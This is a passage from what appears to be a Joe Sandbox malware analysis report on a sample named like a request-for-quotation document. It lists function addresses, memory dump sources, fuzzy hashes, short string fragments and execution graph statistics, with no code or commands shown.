                                                                                                                                                                                                • Instruction Fuzzy Hash: 3671CBB4E0460EDFCB44CFE9D5808AEBBB2FF89311F14952AD415AB314D331A9828F95
                                                                                                                                                                                                Function 080A04D2 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: yS^Z
                                                                                                                                                                                                • API String ID: 0-4128205011
                                                                                                                                                                                                • Opcode ID: 93a7a25cfb762656eef991598042bc92138a6dac8a888d56e1fdf0a214a051aa
                                                                                                                                                                                                • Instruction ID: 95e1180b0dde058dfcc6de906f5b11d2d77bf07e5207352d1c9af8e99d866fa4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 93a7a25cfb762656eef991598042bc92138a6dac8a888d56e1fdf0a214a051aa
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7F61DFB4E0460EDFCB44CFE9D5808AEFBB2BF89311F14956AD415AB314D334A9828F94
                                                                                                                                                                                                Function 068115C8 Relevance: .3, Instructions: 318COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: ca4f371c56e62a5e285ef13fd9489222f74a8fd26abcdd52607e8c80e8a48485
                                                                                                                                                                                                • Instruction ID: 8d3ed3132224896cac7f4cfd1ab09b790f922862b5100582c49880a41b136a15
                                                                                                                                                                                                • Opcode Fuzzy Hash: ca4f371c56e62a5e285ef13fd9489222f74a8fd26abcdd52607e8c80e8a48485
                                                                                                                                                                                                • Instruction Fuzzy Hash: 43A19070B102545FDB98ABBC841437F6AEBAFC8711F24856D954AEB394CE389C038796
                                                                                                                                                                                                Function 06826808 Relevance: .3, Instructions: 297COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: de306fc55c0a2b9b4affa82c03cd6aa0548d826d3479a0e96ab58b94a084ad13
                                                                                                                                                                                                • Instruction ID: 6cb8e11a2a8592b02cc5c32c5f91750a9122a6955e2cb09cb46a39068fefab25
                                                                                                                                                                                                • Opcode Fuzzy Hash: de306fc55c0a2b9b4affa82c03cd6aa0548d826d3479a0e96ab58b94a084ad13
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7FE1093591076ADACB11EF64D850A9DF7B1FFA5300F10DB9AE4093B211EB706AD5CB81
                                                                                                                                                                                                Function 06826840 Relevance: .3, Instructions: 264COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: fc3ed00582e5baa54cd692e627599ee95d40129ccd2d5e5e4e74fcdf2b76952c
                                                                                                                                                                                                • Instruction ID: b703008c039a94fc938bb1ab098cb616c41c1de9397febe321b4dc5620266763
                                                                                                                                                                                                • Opcode Fuzzy Hash: fc3ed00582e5baa54cd692e627599ee95d40129ccd2d5e5e4e74fcdf2b76952c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 6ED1E43591076ADACB11EF64D850A9DF7B1FFA5300F10DB9AE5093B210EB70AAC5CB81
                                                                                                                                                                                                Function 080AA2D8 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 515a1f5df8fe00adf685f62e390a1137ef6a9f598eb3819a69e5f2178bac263d
                                                                                                                                                                                                • Instruction ID: 585cc9150fc1cf5c6d59bfd5d4ebae89d2a14b0a471f2acd0eb6b8b84c1b77a4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 515a1f5df8fe00adf685f62e390a1137ef6a9f598eb3819a69e5f2178bac263d
                                                                                                                                                                                                • Instruction Fuzzy Hash: A3A10A74E011299FCB14CFA9D980AAEBBB2FF89301F24C169D418A7395D734A981CF65
                                                                                                                                                                                                Function 080A1CE0 Relevance: .2, Instructions: 182COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 71a6db417c9d6762097e5b02eb8dfefef0ddbd6c14c2bb61fdacfa0d51c5db68
                                                                                                                                                                                                • Instruction ID: b0726d0c93456c591d6d531cf43a185962793ca286d9ba45cdc997c02d23c527
                                                                                                                                                                                                • Opcode Fuzzy Hash: 71a6db417c9d6762097e5b02eb8dfefef0ddbd6c14c2bb61fdacfa0d51c5db68
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7371FD75D056998BDB1ACF7B885469ABFF3AFC6310F18C1E9C489AB225DB300545CF41
                                                                                                                                                                                                Function 080A8978 Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 92614cff957cd1bb36bcea9ad27fab6cea49fb86d01671d36997e7a9a16d5431
                                                                                                                                                                                                • Instruction ID: c0ee74eb719e844eb2a964a6ed3bb0c0ebad97104915a85eed63447682ec3d05
                                                                                                                                                                                                • Opcode Fuzzy Hash: 92614cff957cd1bb36bcea9ad27fab6cea49fb86d01671d36997e7a9a16d5431
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C810970E012198FDB54CFA9D980AAEBBB2FF89301F24C169D518A7355D734AA81CF61
                                                                                                                                                                                                Function 080BF8F0 Relevance: .2, Instructions: 175COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 10322db33af086f94e67b25e1b340a3826cfd255daf0b2952bb0d75305dd23a3
                                                                                                                                                                                                • Instruction ID: 1e3c186786b7157e4e38bb77932e44c1dc07c87ab8cc8424c263883dcd457eef
                                                                                                                                                                                                • Opcode Fuzzy Hash: 10322db33af086f94e67b25e1b340a3826cfd255daf0b2952bb0d75305dd23a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3371E574E1620AAFCB48CFA9D48499DFBF2FF48311F148566E418AB325D730AA41CF91
                                                                                                                                                                                                Function 080A8968 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a8978140c68e43f848775739126ff69cccf7fd673800766de24d280934548b3e
                                                                                                                                                                                                • Instruction ID: 3c5de9b8c98c15f831e6fb7992959327ec46646dfbb9d14fdf995c417352e5ee
                                                                                                                                                                                                • Opcode Fuzzy Hash: a8978140c68e43f848775739126ff69cccf7fd673800766de24d280934548b3e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 54712D70E111198FDB54CFA9C980AAEBBF2FF89301F14C169D518A7355D734A981CF61
                                                                                                                                                                                                Function 080BF900 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479536866.00000000080B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080B0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80b0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 42184ac17c15a9586c51d6b665563d31ebac1fb9fdcbd945197b658e8e8bbc20
                                                                                                                                                                                                • Instruction ID: 464035f30cc41116243235302827348d1ff326b6f2238cbb604ec97d5ab7225b
                                                                                                                                                                                                • Opcode Fuzzy Hash: 42184ac17c15a9586c51d6b665563d31ebac1fb9fdcbd945197b658e8e8bbc20
                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C71C474E1520AAFCB48CF99D58499EFBF2FF48311F148566E419AB324D730AA41CF91
                                                                                                                                                                                                Function 080A5528 Relevance: .1, Instructions: 129COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 1abc8cec81a17b8d1ea04b8def63e29d74df3f64e10a9c9f849a6cc6ab22e76f
                                                                                                                                                                                                • Instruction ID: cac93824602f524c724c0c142e84aed9824aceaaa7c3d9f414207402d15173d4
                                                                                                                                                                                                • Opcode Fuzzy Hash: 1abc8cec81a17b8d1ea04b8def63e29d74df3f64e10a9c9f849a6cc6ab22e76f
                                                                                                                                                                                                • Instruction Fuzzy Hash: FA513970E11519CBDB14CFAAC9805AEFBB3FF88301F24C56AD518A7245D7349A42CF61
                                                                                                                                                                                                Function 080A1D90 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 9f5455439d5837280034f96c2c5ce1d23ca2e40834c3f292399f2f8a08f11628
                                                                                                                                                                                                • Instruction ID: 301419b086285c79a7d3de870241f47dd3ff5d594c28c0dd0cc37bbc107738d8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 9f5455439d5837280034f96c2c5ce1d23ca2e40834c3f292399f2f8a08f11628
                                                                                                                                                                                                • Instruction Fuzzy Hash: 46514A71E116188BDB68DF6BCD4479EFAF3AFC8301F14C1BA850DA6254EB305A858F51
                                                                                                                                                                                                Function 080A1028 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 911af48f6ed0c1b989cbe91d74515619b288b939a6a75e3775c30507afb9a685
                                                                                                                                                                                                • Instruction ID: 1a75d0751b50480056ae61170111c8785de366027b3a4749d8621503d5fca8b5
                                                                                                                                                                                                • Opcode Fuzzy Hash: 911af48f6ed0c1b989cbe91d74515619b288b939a6a75e3775c30507afb9a685
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F41F5B4E0520ADFDB44CFA9C5815AEFBF2FF88311F24C56AC419A7214D7349A418BA4
                                                                                                                                                                                                Function 080A1038 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a280c82c6f70503124e01f69eb13e4a0324dbf4a095841d4652b40bcd2e2caec
                                                                                                                                                                                                • Instruction ID: 185d56e3d6615464db7871c899afbab7d8460f8c876a00c3af3c076843bd5fe9
                                                                                                                                                                                                • Opcode Fuzzy Hash: a280c82c6f70503124e01f69eb13e4a0324dbf4a095841d4652b40bcd2e2caec
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C41D4B4E0120ADFCB44CFAAC9805AEFBF2FF88311F24C56AC419A7314D7349A418B94
                                                                                                                                                                                                Function 0682DFD8 Relevance: .1, Instructions: 58COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477860803.0000000006820000.00000040.00000800.00020000.00000000.sdmp, Offset: 06820000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6820000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 530cd8b5137feeacc509f75546958c8e6e393f0d800014aa2912460ed2f95e99
                                                                                                                                                                                                • Instruction ID: 2a7e84c3baca9d739bcaf9115791401cbf32ed784c7ebdd2a8c7dc60881730e9
                                                                                                                                                                                                • Opcode Fuzzy Hash: 530cd8b5137feeacc509f75546958c8e6e393f0d800014aa2912460ed2f95e99
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D210071E046589BEB18CF6BCC4469EFBF3AFC8200F04C47AD508A6254DB340546CF65
                                                                                                                                                                                                Function 080A11D0 Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2479493855.00000000080A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 080A0000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_80a0000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: e699ba22636cd646d1d2fe799040295b09e1f80536a85a3e0065562ea6e61777
                                                                                                                                                                                                • Instruction ID: 3fd5d00d30c9ede61d6e6bd55261811d28f7c1feb3178b136f60f3747b2fbb44
                                                                                                                                                                                                • Opcode Fuzzy Hash: e699ba22636cd646d1d2fe799040295b09e1f80536a85a3e0065562ea6e61777
                                                                                                                                                                                                • Instruction Fuzzy Hash: 0A110DB1E016189BEB18CF6B8C4069EFAF3AFC9200F04C17AD458A6268EB3405568F11
                                                                                                                                                                                                Function 0172D1B0 Relevance: 8.9, Strings: 7, Instructions: 103COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: LR^q$LR^q$PH^q$PH^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-3719414822
                                                                                                                                                                                                • Opcode ID: 6e8299083c5373e0f2ccb6352b484e43c2e198cb6db33af55ccdca496c59a2ce
                                                                                                                                                                                                • Instruction ID: 77b74684a7ae55d0ef37f8dcb736ca4ab0aad42cf894f39cea5c7dcbe5009bd7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e8299083c5373e0f2ccb6352b484e43c2e198cb6db33af55ccdca496c59a2ce
                                                                                                                                                                                                • Instruction Fuzzy Hash: F84167B0900218EFCB14DFE9C594A5EBBF2FF45700F25C89AD4262B351DB309A46CB92
                                                                                                                                                                                                Function 01725360 Relevance: 7.8, Strings: 6, Instructions: 264COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: LR^q$LR^q$LR^q$$^q$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-1214618821
                                                                                                                                                                                                • Opcode ID: 984fb06d9a7f02cca2294df1b1e39dce1e5bec4b52507a3a4d47d6522f5e43c5
                                                                                                                                                                                                • Instruction ID: 0fde5fbf4b2372d556cbc0b31b27dc0eb805252a73ee01e6ed9deb764bff67d7
                                                                                                                                                                                                • Opcode Fuzzy Hash: 984fb06d9a7f02cca2294df1b1e39dce1e5bec4b52507a3a4d47d6522f5e43c5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1EB13A70E04128DFCB18CBA9D584AEDF7F2FB88701F248556E416AB351DB74AC82CB91
                                                                                                                                                                                                Function 068149C8 Relevance: 6.4, Strings: 5, Instructions: 135COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$@$B$B$Hbq
                                                                                                                                                                                                • API String ID: 0-1093311442
                                                                                                                                                                                                • Opcode ID: 20607e96d89ab1a4afc34cc1536868dade7e5737bd006ebd4d6b40dbf8e4874a
                                                                                                                                                                                                • Instruction ID: 15cb0883d4d67988c295d6e26fbf3cd91bfb36dd6edc283a7896a97fffccb253
                                                                                                                                                                                                • Opcode Fuzzy Hash: 20607e96d89ab1a4afc34cc1536868dade7e5737bd006ebd4d6b40dbf8e4874a
                                                                                                                                                                                                • Instruction Fuzzy Hash: 72419D71B006158FCB94DF6DC88456EBBFAFF88320B254576D20AEB3A1DB309905CB95
                                                                                                                                                                                                Function 0172A831 Relevance: 5.3, Strings: 4, Instructions: 336COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: Hbq$Xbq$$^q$$^q
                                                                                                                                                                                                • API String ID: 0-2743516598
                                                                                                                                                                                                • Opcode ID: 40199e1e3ae2ad15cd5389475a21891604b5cf966b4f7bbca00195c36cca6ec8
                                                                                                                                                                                                • Instruction ID: cc01799d1e1c19d06b97b5a1964857bcb770f87a23156a3fab38f36a5287a470
                                                                                                                                                                                                • Opcode Fuzzy Hash: 40199e1e3ae2ad15cd5389475a21891604b5cf966b4f7bbca00195c36cca6ec8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 62A18A717082704FD7165B39882463EBFA7EFC161171984AED246CBBD6DE29CC038792
                                                                                                                                                                                                Function 068149B8 Relevance: 5.1, Strings: 4, Instructions: 81COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2477791458.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_6810000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: @$@$B$B
                                                                                                                                                                                                • API String ID: 0-685577651
                                                                                                                                                                                                • Opcode ID: 0eb89c6a9c1bb858ffdc51901fe4ab63960defc982117bd701d48daaf0603ea9
                                                                                                                                                                                                • Instruction ID: c9112e94056d5a3333718f2d8b54ac4277d66b1a382a60f5da11f6bed70e55fa
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0eb89c6a9c1bb858ffdc51901fe4ab63960defc982117bd701d48daaf0603ea9
                                                                                                                                                                                                • Instruction Fuzzy Hash: DA217C71F006168FCBA4CF69C88486EBBF9EF897507164176E606EB361D730D944CB85
                                                                                                                                                                                                Function 017295C0 Relevance: 5.0, Strings: 4, Instructions: 49COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000000.00000002.2463237088.0000000001720000.00000040.00000800.00020000.00000000.sdmp, Offset: 01720000, based on PE: false
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_1720000_RFQ SHEETS PX2 MULE25 SHENZHEN LUCKY.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: \;^q$\;^q$\;^q$\;^q
                                                                                                                                                                                                • API String ID: 0-3001612457
                                                                                                                                                                                                • Opcode ID: 0a67be6086ff79eb1dc0344779197497d7486a894bb4f879e1f647c01ceedd10
                                                                                                                                                                                                • Instruction ID: bc2a2c2171392ac38cb77b3c883e12bbfdc903641644494f40fad9c01fc18b59
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0a67be6086ff79eb1dc0344779197497d7486a894bb4f879e1f647c01ceedd10
                                                                                                                                                                                                • Instruction Fuzzy Hash: 7D0171317101349FCB648E2EC444926B7EBBF89B69B2945AAE606CB3A1DA31DC43C750

                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                Execution Coverage:20.4%
                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                Signature Coverage:29%
                                                                                                                                                                                                Total number of Nodes:31
                                                                                                                                                                                                Total number of Limit Nodes:7
                                                                                                                                                                                                execution_graph 19968 2a3e018 19969 2a3e024 19968->19969 19972 6692968 19969->19972 19973 669298a 19972->19973 19974 2a3e0c3 19973->19974 19979 6699548 19973->19979 19987 669992c 19973->19987 19993 6699318 19973->19993 20002 6699328 19973->20002 19980 669954d LdrInitializeThunk 19979->19980 19986 6699619 19980->19986 19982 66996d9 19982->19974 19983 6699924 LdrInitializeThunk 19983->19982 19985 6699328 2 API calls 19985->19986 19986->19982 19986->19983 19986->19985 19992 66997e3 19987->19992 19989 6699924 LdrInitializeThunk 19990 6699a81 19989->19990 19990->19974 19991 6699328 2 API calls 19991->19992 19992->19989 19992->19991 19994 669933a 19993->19994 19995 669933f 19993->19995 19994->19974 19995->19994 19996 669957e LdrInitializeThunk 19995->19996 20001 6699619 19996->20001 19997 66996d9 19997->19974 19998 6699924 LdrInitializeThunk 19998->19997 20000 6699328 2 API calls 20000->20001 20001->19997 20001->19998 20001->20000 20003 669933a 20002->20003 20004 669933f 20002->20004 20003->19974 20004->20003 20005 669957e LdrInitializeThunk 20004->20005 20008 6699619 20005->20008 20006 66996d9 20006->19974 20007 6699a69 LdrInitializeThunk 20007->20006 20008->20006 20008->20007

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                Function 06699548 Relevance: 3.4, APIs: 2, Instructions: 357libraryCOMMON
                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                • Executed
                                                                                                                                                                                                • Not Executed
